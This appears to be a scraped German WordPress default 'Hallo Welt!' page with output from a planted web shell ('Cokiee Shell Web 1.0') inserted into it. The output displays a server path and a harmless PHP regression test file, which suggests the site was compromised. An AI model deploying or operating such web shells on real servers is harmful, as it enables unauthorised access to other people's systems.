Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug71474.phpt |
--TEST-- Bug #71474: Crash because of VM stack corruption on Magento2 --FILE-- <?php class foo { function __call($name, $args) { $a = $b = $c = $d = $e = $f = 1; } } function test($n, $x) { // var_dump($n); if ($n > 0) { $x->bug(); test($n - 1, $x); } } test(3000, new foo()); echo "OK\n"; ?> --EXPECT-- OK
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare